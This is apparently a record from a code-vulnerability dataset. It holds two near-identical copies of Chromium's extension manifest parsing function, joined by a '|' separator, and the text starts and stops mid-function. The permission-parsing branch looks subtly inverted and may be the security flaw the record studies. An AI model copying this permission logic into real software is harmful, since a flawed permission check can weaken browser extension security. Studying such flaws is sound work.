*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidToolstrip, base::IntToString(i));
return false;
}
toolstrips_.push_back(toolstrip);
}
}
if (source.HasKey(keys::kContentScripts)) {
ListValue* list_value;
if (!source.GetList(keys::kContentScripts, &list_value)) {
*error = errors::kInvalidContentScriptsList;
return false;
}
for (size_t i = 0; i < list_value->GetSize(); ++i) {
DictionaryValue* content_script = NULL;
if (!list_value->GetDictionary(i, &content_script)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidContentScript, base::IntToString(i));
return false;
}
UserScript script;
if (!LoadUserScriptHelper(content_script, i, flags, error, &script))
return false; // Failed to parse script context definition.
script.set_extension_id(id());
if (converted_from_user_script_) {
script.set_emulate_greasemonkey(true);
script.set_match_all_frames(true); // Greasemonkey matches all frames.
}
content_scripts_.push_back(script);
}
}
DictionaryValue* page_action_value = NULL;
if (source.HasKey(keys::kPageActions)) {
ListValue* list_value = NULL;
if (!source.GetList(keys::kPageActions, &list_value)) {
*error = errors::kInvalidPageActionsList;
return false;
}
size_t list_value_length = list_value->GetSize();
if (list_value_length == 0u) {
} else if (list_value_length == 1u) {
if (!list_value->GetDictionary(0, &page_action_value)) {
*error = errors::kInvalidPageAction;
return false;
}
} else { // list_value_length > 1u.
*error = errors::kInvalidPageActionsListSize;
return false;
}
} else if (source.HasKey(keys::kPageAction)) {
if (!source.GetDictionary(keys::kPageAction, &page_action_value)) {
*error = errors::kInvalidPageAction;
return false;
}
}
if (page_action_value) {
page_action_.reset(
LoadExtensionActionHelper(page_action_value, error));
if (!page_action_.get())
return false; // Failed to parse page action definition.
}
if (source.HasKey(keys::kBrowserAction)) {
DictionaryValue* browser_action_value = NULL;
if (!source.GetDictionary(keys::kBrowserAction, &browser_action_value)) {
*error = errors::kInvalidBrowserAction;
return false;
}
browser_action_.reset(
LoadExtensionActionHelper(browser_action_value, error));
if (!browser_action_.get())
return false; // Failed to parse browser action definition.
}
if (source.HasKey(keys::kFileBrowserHandlers)) {
ListValue* file_browser_handlers_value = NULL;
if (!source.GetList(keys::kFileBrowserHandlers,
&file_browser_handlers_value)) {
*error = errors::kInvalidFileBrowserHandler;
return false;
}
file_browser_handlers_.reset(
LoadFileBrowserHandlers(file_browser_handlers_value, error));
if (!file_browser_handlers_.get())
return false; // Failed to parse file browser actions definition.
}
if (!LoadIsApp(manifest_value_.get(), error) ||
!LoadExtent(manifest_value_.get(), keys::kWebURLs,
&extent_,
errors::kInvalidWebURLs, errors::kInvalidWebURL,
parse_strictness, error) ||
!EnsureNotHybridApp(manifest_value_.get(), error) ||
!LoadLaunchURL(manifest_value_.get(), error) ||
!LoadLaunchContainer(manifest_value_.get(), error) ||
!LoadAppIsolation(manifest_value_.get(), error)) {
return false;
}
if (source.HasKey(keys::kOptionsPage)) {
std::string options_str;
if (!source.GetString(keys::kOptionsPage, &options_str)) {
*error = errors::kInvalidOptionsPage;
return false;
}
if (is_hosted_app()) {
GURL options_url(options_str);
if (!options_url.is_valid() ||
!(options_url.SchemeIs("http") || options_url.SchemeIs("https"))) {
*error = errors::kInvalidOptionsPageInHostedApp;
return false;
}
options_url_ = options_url;
} else {
GURL absolute(options_str);
if (absolute.is_valid()) {
*error = errors::kInvalidOptionsPageExpectUrlInPackage;
return false;
}
options_url_ = GetResourceURL(options_str);
if (!options_url_.is_valid()) {
*error = errors::kInvalidOptionsPage;
return false;
}
}
}
if (source.HasKey(keys::kPermissions)) {
ListValue* permissions = NULL;
if (!source.GetList(keys::kPermissions, &permissions)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPermissions, "");
return false;
}
for (size_t i = 0; i < permissions->GetSize(); ++i) {
std::string permission_str;
if (!permissions->GetString(i, &permission_str)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPermission, base::IntToString(i));
return false;
}
if (!IsComponentOnlyPermission(permission_str)
#ifndef NDEBUG
&& !CommandLine::ForCurrentProcess()->HasSwitch(
switches::kExposePrivateExtensionApi)
#endif
) {
continue;
}
if (permission_str == kOldUnlimitedStoragePermission)
permission_str = kUnlimitedStoragePermission;
if (web_extent().is_empty() || location() == Extension::COMPONENT) {
if (IsAPIPermission(permission_str)) {
if (permission_str == Extension::kExperimentalPermission &&
!CommandLine::ForCurrentProcess()->HasSwitch(
switches::kEnableExperimentalExtensionApis) &&
location() != Extension::COMPONENT) {
*error = errors::kExperimentalFlagRequired;
return false;
}
api_permissions_.insert(permission_str);
continue;
}
} else {
if (IsHostedAppPermission(permission_str)) {
api_permissions_.insert(permission_str);
continue;
}
}
URLPattern pattern = URLPattern(CanExecuteScriptEverywhere() ?
URLPattern::SCHEME_ALL : kValidHostPermissionSchemes);
URLPattern::ParseResult parse_result = pattern.Parse(permission_str,
parse_strictness);
if (parse_result == URLPattern::PARSE_SUCCESS) {
if (!CanSpecifyHostPermission(pattern)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPermissionScheme, base::IntToString(i));
return false;
}
pattern.SetPath("/*");
if (pattern.MatchesScheme(chrome::kFileScheme) &&
!CanExecuteScriptEverywhere()) {
wants_file_access_ = true;
if (!(flags & ALLOW_FILE_ACCESS))
pattern.set_valid_schemes(
pattern.valid_schemes() & ~URLPattern::SCHEME_FILE);
}
host_permissions_.push_back(pattern);
}
}
}
if (source.HasKey(keys::kBackground)) {
std::string background_str;
if (!source.GetString(keys::kBackground, &background_str)) {
*error = errors::kInvalidBackground;
return false;
}
if (is_hosted_app()) {
if (api_permissions_.find(kBackgroundPermission) ==
api_permissions_.end()) {
*error = errors::kBackgroundPermissionNeeded;
return false;
}
GURL bg_page(background_str);
if (!bg_page.is_valid()) {
*error = errors::kInvalidBackgroundInHostedApp;
return false;
}
if (!(bg_page.SchemeIs("https") ||
(CommandLine::ForCurrentProcess()->HasSwitch(
switches::kAllowHTTPBackgroundPage) &&
bg_page.SchemeIs("http")))) {
*error = errors::kInvalidBackgroundInHostedApp;
return false;
}
background_url_ = bg_page;
} else {
background_url_ = GetResourceURL(background_str);
}
}
if (source.HasKey(keys::kDefaultLocale)) {
if (!source.GetString(keys::kDefaultLocale, &default_locale_) ||
!l10n_util::IsValidLocaleSyntax(default_locale_)) {
*error = errors::kInvalidDefaultLocale;
return false;
}
}
if (source.HasKey(keys::kChromeURLOverrides)) {
DictionaryValue* overrides = NULL;
if (!source.GetDictionary(keys::kChromeURLOverrides, &overrides)) {
*error = errors::kInvalidChromeURLOverrides;
return false;
}
for (DictionaryValue::key_iterator iter = overrides->begin_keys();
iter != overrides->end_keys(); ++iter) {
std::string page = *iter;
std::string val;
if ((page != chrome::kChromeUINewTabHost &&
#if defined(TOUCH_UI)
page != chrome::kChromeUIKeyboardHost &&
#endif
#if defined(OS_CHROMEOS)
page != chrome::kChromeUIActivationMessageHost &&
#endif
page != chrome::kChromeUIBookmarksHost &&
page != chrome::kChromeUIHistoryHost) ||
!overrides->GetStringWithoutPathExpansion(*iter, &val)) {
*error = errors::kInvalidChromeURLOverrides;
return false;
}
chrome_url_overrides_[page] = GetResourceURL(val);
}
if (overrides->size() > 1) {
*error = errors::kMultipleOverrides;
return false;
}
}
if (source.HasKey(keys::kOmnibox)) {
if (!source.GetString(keys::kOmniboxKeyword, &omnibox_keyword_) ||
omnibox_keyword_.empty()) {
*error = errors::kInvalidOmniboxKeyword;
return false;
}
}
if (CommandLine::ForCurrentProcess()->HasSwitch(
switches::kEnableExperimentalExtensionApis) &&
source.HasKey(keys::kContentSecurityPolicy)) {
std::string content_security_policy;
if (!source.GetString(keys::kContentSecurityPolicy,
&content_security_policy)) {
*error = errors::kInvalidContentSecurityPolicy;
return false;
}
const char kBadCSPCharacters[] = {'\r', '\n', '\0'};
if (content_security_policy.find_first_of(kBadCSPCharacters, 0,
arraysize(kBadCSPCharacters)) !=
std::string::npos) {
*error = errors::kInvalidContentSecurityPolicy;
return false;
}
content_security_policy_ = content_security_policy;
}
if (source.HasKey(keys::kDevToolsPage)) {
std::string devtools_str;
if (!source.GetString(keys::kDevToolsPage, &devtools_str)) {
*error = errors::kInvalidDevToolsPage;
return false;
}
if (!HasApiPermission(Extension::kExperimentalPermission)) {
*error = errors::kDevToolsExperimental;
return false;
}
devtools_url_ = GetResourceURL(devtools_str);
}
if (source.HasKey(keys::kSidebar)) {
DictionaryValue* sidebar_value = NULL;
if (!source.GetDictionary(keys::kSidebar, &sidebar_value)) {
*error = errors::kInvalidSidebar;
return false;
}
if (!HasApiPermission(Extension::kExperimentalPermission)) {
*error = errors::kSidebarExperimental;
return false;
}
sidebar_defaults_.reset(LoadExtensionSidebarDefaults(sidebar_value, error));
if (!sidebar_defaults_.get())
return false; // Failed to parse sidebar definition.
}
if (source.HasKey(keys::kTts)) {
DictionaryValue* tts_dict = NULL;
if (!source.GetDictionary(keys::kTts, &tts_dict)) {
*error = errors::kInvalidTts;
return false;
}
if (tts_dict->HasKey(keys::kTtsVoices)) {
ListValue* tts_voices = NULL;
if (!tts_dict->GetList(keys::kTtsVoices, &tts_voices)) {
*error = errors::kInvalidTtsVoices;
return false;
}
for (size_t i = 0; i < tts_voices->GetSize(); i++) {
DictionaryValue* one_tts_voice = NULL;
if (!tts_voices->GetDictionary(i, &one_tts_voice)) {
*error = errors::kInvalidTtsVoices;
return false;
}
TtsVoice voice_data;
if (one_tts_voice->HasKey(keys::kTtsVoicesVoiceName)) {
if (!one_tts_voice->GetString(
keys::kTtsVoicesVoiceName, &voice_data.voice_name)) {
*error = errors::kInvalidTtsVoicesVoiceName;
return false;
}
}
if (one_tts_voice->HasKey(keys::kTtsVoicesLocale)) {
if (!one_tts_voice->GetString(
keys::kTtsVoicesLocale, &voice_data.locale) ||
!l10n_util::IsValidLocaleSyntax(voice_data.locale)) {
*error = errors::kInvalidTtsVoicesLocale;
return false;
}
}
if (one_tts_voice->HasKey(keys::kTtsVoicesGender)) {
if (!one_tts_voice->GetString(
keys::kTtsVoicesGender, &voice_data.gender) ||
(voice_data.gender != keys::kTtsGenderMale &&
voice_data.gender != keys::kTtsGenderFemale)) {
*error = errors::kInvalidTtsVoicesGender;
return false;
}
}
tts_voices_.push_back(voice_data);
}
}
}
incognito_split_mode_ = is_app();
if (source.HasKey(keys::kIncognito)) {
std::string value;
if (!source.GetString(keys::kIncognito, &value)) {
*error = errors::kInvalidIncognitoBehavior;
return false;
}
if (value == values::kIncognitoSpanning) {
incognito_split_mode_ = false;
} else if (value == values::kIncognitoSplit) {
incognito_split_mode_ = true;
} else {
*error = errors::kInvalidIncognitoBehavior;
return false;
}
}
if (HasMultipleUISurfaces()) {
*error = errors::kOneUISurfaceOnly;
return false;
}
InitEffectiveHostPermissions();
DCHECK(source.Equals(manifest_value_.get()));
return true;
}
|
bool Extension::InitFromValue(const DictionaryValue& source, int flags,
std::string* error) {
URLPattern::ParseOption parse_strictness =
(flags & STRICT_ERROR_CHECKS ? URLPattern::PARSE_STRICT
: URLPattern::PARSE_LENIENT);
if (source.HasKey(keys::kPublicKey)) {
std::string public_key_bytes;
if (!source.GetString(keys::kPublicKey,
&public_key_) ||
!ParsePEMKeyBytes(public_key_,
&public_key_bytes) ||
!GenerateId(public_key_bytes, &id_)) {
*error = errors::kInvalidKey;
return false;
}
} else if (flags & REQUIRE_KEY) {
*error = errors::kInvalidKey;
return false;
} else {
id_ = Extension::GenerateIdForPath(path());
if (id_.empty()) {
NOTREACHED() << "Could not create ID from path.";
return false;
}
}
manifest_value_.reset(source.DeepCopy());
extension_url_ = Extension::GetBaseURLFromExtensionId(id());
std::string version_str;
if (!source.GetString(keys::kVersion, &version_str)) {
*error = errors::kInvalidVersion;
return false;
}
version_.reset(Version::GetVersionFromString(version_str));
if (!version_.get() ||
version_->components().size() > 4) {
*error = errors::kInvalidVersion;
return false;
}
string16 localized_name;
if (!source.GetString(keys::kName, &localized_name)) {
*error = errors::kInvalidName;
return false;
}
base::i18n::AdjustStringForLocaleDirection(&localized_name);
name_ = UTF16ToUTF8(localized_name);
if (source.HasKey(keys::kDescription)) {
if (!source.GetString(keys::kDescription,
&description_)) {
*error = errors::kInvalidDescription;
return false;
}
}
if (source.HasKey(keys::kHomepageURL)) {
std::string tmp;
if (!source.GetString(keys::kHomepageURL, &tmp)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidHomepageURL, "");
return false;
}
homepage_url_ = GURL(tmp);
if (!homepage_url_.is_valid()) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidHomepageURL, tmp);
return false;
}
}
if (source.HasKey(keys::kUpdateURL)) {
std::string tmp;
if (!source.GetString(keys::kUpdateURL, &tmp)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidUpdateURL, "");
return false;
}
update_url_ = GURL(tmp);
if (!update_url_.is_valid() ||
update_url_.has_ref()) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidUpdateURL, tmp);
return false;
}
}
if (source.HasKey(keys::kMinimumChromeVersion)) {
std::string minimum_version_string;
if (!source.GetString(keys::kMinimumChromeVersion,
&minimum_version_string)) {
*error = errors::kInvalidMinimumChromeVersion;
return false;
}
scoped_ptr<Version> minimum_version(
Version::GetVersionFromString(minimum_version_string));
if (!minimum_version.get()) {
*error = errors::kInvalidMinimumChromeVersion;
return false;
}
chrome::VersionInfo current_version_info;
if (!current_version_info.is_valid()) {
NOTREACHED();
return false;
}
scoped_ptr<Version> current_version(
Version::GetVersionFromString(current_version_info.Version()));
if (!current_version.get()) {
DCHECK(false);
return false;
}
if (current_version->CompareTo(*minimum_version) < 0) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kChromeVersionTooLow,
l10n_util::GetStringUTF8(IDS_PRODUCT_NAME),
minimum_version_string);
return false;
}
}
source.GetBoolean(keys::kConvertedFromUserScript,
&converted_from_user_script_);
if (source.HasKey(keys::kIcons)) {
DictionaryValue* icons_value = NULL;
if (!source.GetDictionary(keys::kIcons, &icons_value)) {
*error = errors::kInvalidIcons;
return false;
}
for (size_t i = 0; i < arraysize(kIconSizes); ++i) {
std::string key = base::IntToString(kIconSizes[i]);
if (icons_value->HasKey(key)) {
std::string icon_path;
if (!icons_value->GetString(key, &icon_path)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidIconPath, key);
return false;
}
if (!icon_path.empty() && icon_path[0] == '/')
icon_path = icon_path.substr(1);
if (icon_path.empty()) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidIconPath, key);
return false;
}
icons_.Add(kIconSizes[i], icon_path);
}
}
}
is_theme_ = false;
if (source.HasKey(keys::kTheme)) {
if (ContainsNonThemeKeys(source)) {
*error = errors::kThemesCannotContainExtensions;
return false;
}
DictionaryValue* theme_value = NULL;
if (!source.GetDictionary(keys::kTheme, &theme_value)) {
*error = errors::kInvalidTheme;
return false;
}
is_theme_ = true;
DictionaryValue* images_value = NULL;
if (theme_value->GetDictionary(keys::kThemeImages, &images_value)) {
for (DictionaryValue::key_iterator iter = images_value->begin_keys();
iter != images_value->end_keys(); ++iter) {
std::string val;
if (!images_value->GetString(*iter, &val)) {
*error = errors::kInvalidThemeImages;
return false;
}
}
theme_images_.reset(images_value->DeepCopy());
}
DictionaryValue* colors_value = NULL;
if (theme_value->GetDictionary(keys::kThemeColors, &colors_value)) {
for (DictionaryValue::key_iterator iter = colors_value->begin_keys();
iter != colors_value->end_keys(); ++iter) {
ListValue* color_list = NULL;
double alpha = 0.0;
int color = 0;
if (!colors_value->GetListWithoutPathExpansion(*iter, &color_list) ||
((color_list->GetSize() != 3) &&
((color_list->GetSize() != 4) ||
!color_list->GetDouble(3, &alpha))) ||
!color_list->GetInteger(0, &color) ||
!color_list->GetInteger(1, &color) ||
!color_list->GetInteger(2, &color)) {
*error = errors::kInvalidThemeColors;
return false;
}
}
theme_colors_.reset(colors_value->DeepCopy());
}
DictionaryValue* tints_value = NULL;
if (theme_value->GetDictionary(keys::kThemeTints, &tints_value)) {
for (DictionaryValue::key_iterator iter = tints_value->begin_keys();
iter != tints_value->end_keys(); ++iter) {
ListValue* tint_list = NULL;
double v = 0.0;
if (!tints_value->GetListWithoutPathExpansion(*iter, &tint_list) ||
tint_list->GetSize() != 3 ||
!tint_list->GetDouble(0, &v) ||
!tint_list->GetDouble(1, &v) ||
!tint_list->GetDouble(2, &v)) {
*error = errors::kInvalidThemeTints;
return false;
}
}
theme_tints_.reset(tints_value->DeepCopy());
}
DictionaryValue* display_properties_value = NULL;
if (theme_value->GetDictionary(keys::kThemeDisplayProperties,
&display_properties_value)) {
theme_display_properties_.reset(
display_properties_value->DeepCopy());
}
return true;
}
if (source.HasKey(keys::kPlugins)) {
ListValue* list_value = NULL;
if (!source.GetList(keys::kPlugins, &list_value)) {
*error = errors::kInvalidPlugins;
return false;
}
for (size_t i = 0; i < list_value->GetSize(); ++i) {
DictionaryValue* plugin_value = NULL;
std::string path_str;
bool is_public = false;
if (!list_value->GetDictionary(i, &plugin_value)) {
*error = errors::kInvalidPlugins;
return false;
}
if (!plugin_value->GetString(keys::kPluginsPath, &path_str)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPluginsPath, base::IntToString(i));
return false;
}
if (plugin_value->HasKey(keys::kPluginsPublic)) {
if (!plugin_value->GetBoolean(keys::kPluginsPublic, &is_public)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPluginsPublic, base::IntToString(i));
return false;
}
}
#if !defined(OS_CHROMEOS)
plugins_.push_back(PluginInfo());
plugins_.back().path = path().AppendASCII(path_str);
plugins_.back().is_public = is_public;
#endif
}
}
if (CommandLine::ForCurrentProcess()->HasSwitch(
switches::kEnableExperimentalExtensionApis) &&
source.HasKey(keys::kNaClModules)) {
ListValue* list_value = NULL;
if (!source.GetList(keys::kNaClModules, &list_value)) {
*error = errors::kInvalidNaClModules;
return false;
}
for (size_t i = 0; i < list_value->GetSize(); ++i) {
DictionaryValue* module_value = NULL;
std::string path_str;
std::string mime_type;
if (!list_value->GetDictionary(i, &module_value)) {
*error = errors::kInvalidNaClModules;
return false;
}
if (!module_value->GetString(keys::kNaClModulesPath, &path_str)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidNaClModulesPath, base::IntToString(i));
return false;
}
if (!module_value->GetString(keys::kNaClModulesMIMEType, &mime_type)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidNaClModulesMIMEType, base::IntToString(i));
return false;
}
nacl_modules_.push_back(NaClModuleInfo());
nacl_modules_.back().url = GetResourceURL(path_str);
nacl_modules_.back().mime_type = mime_type;
}
}
if (CommandLine::ForCurrentProcess()->HasSwitch(
switches::kEnableExperimentalExtensionApis) &&
source.HasKey(keys::kToolstrips)) {
ListValue* list_value = NULL;
if (!source.GetList(keys::kToolstrips, &list_value)) {
*error = errors::kInvalidToolstrips;
return false;
}
for (size_t i = 0; i < list_value->GetSize(); ++i) {
GURL toolstrip;
DictionaryValue* toolstrip_value = NULL;
std::string toolstrip_path;
if (list_value->GetString(i, &toolstrip_path)) {
toolstrip = GetResourceURL(toolstrip_path);
} else if (list_value->GetDictionary(i, &toolstrip_value)) {
if (!toolstrip_value->GetString(keys::kToolstripPath,
&toolstrip_path)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidToolstrip, base::IntToString(i));
return false;
}
toolstrip = GetResourceURL(toolstrip_path);
} else {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidToolstrip, base::IntToString(i));
return false;
}
toolstrips_.push_back(toolstrip);
}
}
if (source.HasKey(keys::kContentScripts)) {
ListValue* list_value;
if (!source.GetList(keys::kContentScripts, &list_value)) {
*error = errors::kInvalidContentScriptsList;
return false;
}
for (size_t i = 0; i < list_value->GetSize(); ++i) {
DictionaryValue* content_script = NULL;
if (!list_value->GetDictionary(i, &content_script)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidContentScript, base::IntToString(i));
return false;
}
UserScript script;
if (!LoadUserScriptHelper(content_script, i, flags, error, &script))
return false; // Failed to parse script context definition.
script.set_extension_id(id());
if (converted_from_user_script_) {
script.set_emulate_greasemonkey(true);
script.set_match_all_frames(true); // Greasemonkey matches all frames.
}
content_scripts_.push_back(script);
}
}
DictionaryValue* page_action_value = NULL;
if (source.HasKey(keys::kPageActions)) {
ListValue* list_value = NULL;
if (!source.GetList(keys::kPageActions, &list_value)) {
*error = errors::kInvalidPageActionsList;
return false;
}
size_t list_value_length = list_value->GetSize();
if (list_value_length == 0u) {
} else if (list_value_length == 1u) {
if (!list_value->GetDictionary(0, &page_action_value)) {
*error = errors::kInvalidPageAction;
return false;
}
} else { // list_value_length > 1u.
*error = errors::kInvalidPageActionsListSize;
return false;
}
} else if (source.HasKey(keys::kPageAction)) {
if (!source.GetDictionary(keys::kPageAction, &page_action_value)) {
*error = errors::kInvalidPageAction;
return false;
}
}
if (page_action_value) {
page_action_.reset(
LoadExtensionActionHelper(page_action_value, error));
if (!page_action_.get())
return false; // Failed to parse page action definition.
}
if (source.HasKey(keys::kBrowserAction)) {
DictionaryValue* browser_action_value = NULL;
if (!source.GetDictionary(keys::kBrowserAction, &browser_action_value)) {
*error = errors::kInvalidBrowserAction;
return false;
}
browser_action_.reset(
LoadExtensionActionHelper(browser_action_value, error));
if (!browser_action_.get())
return false; // Failed to parse browser action definition.
}
if (source.HasKey(keys::kFileBrowserHandlers)) {
ListValue* file_browser_handlers_value = NULL;
if (!source.GetList(keys::kFileBrowserHandlers,
&file_browser_handlers_value)) {
*error = errors::kInvalidFileBrowserHandler;
return false;
}
file_browser_handlers_.reset(
LoadFileBrowserHandlers(file_browser_handlers_value, error));
if (!file_browser_handlers_.get())
return false; // Failed to parse file browser actions definition.
}
if (!LoadIsApp(manifest_value_.get(), error) ||
!LoadExtent(manifest_value_.get(), keys::kWebURLs,
&extent_,
errors::kInvalidWebURLs, errors::kInvalidWebURL,
parse_strictness, error) ||
!EnsureNotHybridApp(manifest_value_.get(), error) ||
!LoadLaunchURL(manifest_value_.get(), error) ||
!LoadLaunchContainer(manifest_value_.get(), error) ||
!LoadAppIsolation(manifest_value_.get(), error)) {
return false;
}
if (source.HasKey(keys::kOptionsPage)) {
std::string options_str;
if (!source.GetString(keys::kOptionsPage, &options_str)) {
*error = errors::kInvalidOptionsPage;
return false;
}
if (is_hosted_app()) {
GURL options_url(options_str);
if (!options_url.is_valid() ||
!(options_url.SchemeIs("http") || options_url.SchemeIs("https"))) {
*error = errors::kInvalidOptionsPageInHostedApp;
return false;
}
options_url_ = options_url;
} else {
GURL absolute(options_str);
if (absolute.is_valid()) {
*error = errors::kInvalidOptionsPageExpectUrlInPackage;
return false;
}
options_url_ = GetResourceURL(options_str);
if (!options_url_.is_valid()) {
*error = errors::kInvalidOptionsPage;
return false;
}
}
}
if (source.HasKey(keys::kPermissions)) {
ListValue* permissions = NULL;
if (!source.GetList(keys::kPermissions, &permissions)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPermissions, "");
return false;
}
for (size_t i = 0; i < permissions->GetSize(); ++i) {
std::string permission_str;
if (!permissions->GetString(i, &permission_str)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPermission, base::IntToString(i));
return false;
}
if (!IsComponentOnlyPermission(permission_str)
#ifndef NDEBUG
&& !CommandLine::ForCurrentProcess()->HasSwitch(
switches::kExposePrivateExtensionApi)
#endif
) {
continue;
}
if (permission_str == kOldUnlimitedStoragePermission)
permission_str = kUnlimitedStoragePermission;
if (web_extent().is_empty() || location() == Extension::COMPONENT) {
if (IsAPIPermission(permission_str)) {
if (permission_str == Extension::kExperimentalPermission &&
!CommandLine::ForCurrentProcess()->HasSwitch(
switches::kEnableExperimentalExtensionApis) &&
location() != Extension::COMPONENT) {
*error = errors::kExperimentalFlagRequired;
return false;
}
api_permissions_.insert(permission_str);
continue;
}
} else {
if (IsHostedAppPermission(permission_str)) {
api_permissions_.insert(permission_str);
continue;
}
}
URLPattern pattern = URLPattern(CanExecuteScriptEverywhere() ?
URLPattern::SCHEME_ALL : kValidHostPermissionSchemes);
URLPattern::ParseResult parse_result = pattern.Parse(permission_str,
parse_strictness);
if (parse_result == URLPattern::PARSE_SUCCESS) {
if (!CanSpecifyHostPermission(pattern)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPermissionScheme, base::IntToString(i));
return false;
}
pattern.SetPath("/*");
if (pattern.MatchesScheme(chrome::kFileScheme) &&
!CanExecuteScriptEverywhere()) {
wants_file_access_ = true;
if (!(flags & ALLOW_FILE_ACCESS))
pattern.set_valid_schemes(
pattern.valid_schemes() & ~URLPattern::SCHEME_FILE);
}
host_permissions_.push_back(pattern);
}
}
}
if (source.HasKey(keys::kBackground)) {
std::string background_str;
if (!source.GetString(keys::kBackground, &background_str)) {
*error = errors::kInvalidBackground;
return false;
}
if (is_hosted_app()) {
if (api_permissions_.find(kBackgroundPermission) ==
api_permissions_.end()) {
*error = errors::kBackgroundPermissionNeeded;
return false;
}
GURL bg_page(background_str);
if (!bg_page.is_valid()) {
*error = errors::kInvalidBackgroundInHostedApp;
return false;
}
if (!(bg_page.SchemeIs("https") ||
(CommandLine::ForCurrentProcess()->HasSwitch(
switches::kAllowHTTPBackgroundPage) &&
bg_page.SchemeIs("http")))) {
*error = errors::kInvalidBackgroundInHostedApp;
return false;
}
background_url_ = bg_page;
} else {
background_url_ = GetResourceURL(background_str);
}
}
if (source.HasKey(keys::kDefaultLocale)) {
if (!source.GetString(keys::kDefaultLocale, &default_locale_) ||
!l10n_util::IsValidLocaleSyntax(default_locale_)) {
*error = errors::kInvalidDefaultLocale;
return false;
}
}
if (source.HasKey(keys::kChromeURLOverrides)) {
DictionaryValue* overrides = NULL;
if (!source.GetDictionary(keys::kChromeURLOverrides, &overrides)) {
*error = errors::kInvalidChromeURLOverrides;
return false;
}
for (DictionaryValue::key_iterator iter = overrides->begin_keys();
iter != overrides->end_keys(); ++iter) {
std::string page = *iter;
std::string val;
if ((page != chrome::kChromeUINewTabHost &&
#if defined(TOUCH_UI)
page != chrome::kChromeUIKeyboardHost &&
#endif
#if defined(OS_CHROMEOS)
page != chrome::kChromeUIActivationMessageHost &&
#endif
page != chrome::kChromeUIBookmarksHost &&
page != chrome::kChromeUIHistoryHost) ||
!overrides->GetStringWithoutPathExpansion(*iter, &val)) {
*error = errors::kInvalidChromeURLOverrides;
return false;
}
chrome_url_overrides_[page] = GetResourceURL(val);
}
if (overrides->size() > 1) {
*error = errors::kMultipleOverrides;
return false;
}
}
if (source.HasKey(keys::kOmnibox)) {
if (!source.GetString(keys::kOmniboxKeyword, &omnibox_keyword_) ||
omnibox_keyword_.empty()) {
*error = errors::kInvalidOmniboxKeyword;
return false;
}
}
if (CommandLine::ForCurrentProcess()->HasSwitch(
switches::kEnableExperimentalExtensionApis) &&
source.HasKey(keys::kContentSecurityPolicy)) {
std::string content_security_policy;
if (!source.GetString(keys::kContentSecurityPolicy,
&content_security_policy)) {
*error = errors::kInvalidContentSecurityPolicy;
return false;
}
const char kBadCSPCharacters[] = {'\r', '\n', '\0'};
if (content_security_policy.find_first_of(kBadCSPCharacters, 0,
arraysize(kBadCSPCharacters)) !=
std::string::npos) {
*error = errors::kInvalidContentSecurityPolicy;
return false;
}
content_security_policy_ = content_security_policy;
}
if (source.HasKey(keys::kDevToolsPage)) {
std::string devtools_str;
if (!source.GetString(keys::kDevToolsPage, &devtools_str)) {
*error = errors::kInvalidDevToolsPage;
return false;
}
if (!HasApiPermission(Extension::kExperimentalPermission)) {
*error = errors::kDevToolsExperimental;
return false;
}
devtools_url_ = GetResourceURL(devtools_str);
}
if (source.HasKey(keys::kSidebar)) {
DictionaryValue* sidebar_value = NULL;
if (!source.GetDictionary(keys::kSidebar, &sidebar_value)) {
*error = errors::kInvalidSidebar;
return false;
}
if (!HasApiPermission(Extension::kExperimentalPermission)) {
*error = errors::kSidebarExperimental;
return false;
}
sidebar_defaults_.reset(LoadExtensionSidebarDefaults(sidebar_value, error));
if (!sidebar_defaults_.get())
return false; // Failed to parse sidebar definition.
}
if (source.HasKey(keys::kTts)) {
DictionaryValue* tts_dict = NULL;
if (!source.GetDictionary(keys::kTts, &tts_dict)) {
*error = errors::kInvalidTts;
return false;
}
if (tts_dict->HasKey(keys::kTtsVoices)) {
ListValue* tts_voices = NULL;
if (!tts_dict->GetList(keys::kTtsVoices, &tts_voices)) {
*error = errors::kInvalidTtsVoices;
return false;
}
for (size_t i = 0; i < tts_voices->GetSize(); i++) {
DictionaryValue* one_tts_voice = NULL;
if (!tts_voices->GetDictionary(i, &one_tts_voice)) {
*error = errors::kInvalidTtsVoices;
return false;
}
TtsVoice voice_data;
if (one_tts_voice->HasKey(keys::kTtsVoicesVoiceName)) {
if (!one_tts_voice->GetString(
keys::kTtsVoicesVoiceName, &voice_data.voice_name)) {
*error = errors::kInvalidTtsVoicesVoiceName;
return false;
}
}
if (one_tts_voice->HasKey(keys::kTtsVoicesLocale)) {
if (!one_tts_voice->GetString(
keys::kTtsVoicesLocale, &voice_data.locale) ||
!l10n_util::IsValidLocaleSyntax(voice_data.locale)) {
*error = errors::kInvalidTtsVoicesLocale;
return false;
}
}
if (one_tts_voice->HasKey(keys::kTtsVoicesGender)) {
if (!one_tts_voice->GetString(
keys::kTtsVoicesGender, &voice_data.gender) ||
(voice_data.gender != keys::kTtsGenderMale &&
voice_data.gender != keys::kTtsGenderFemale)) {
*error = errors::kInvalidTtsVoicesGender;
return false;
}
}
tts_voices_.push_back(voice_data);
}
}
}
incognito_split_mode_ = is_app();
if (source.HasKey(keys::kIncognito)) {
std::string value;
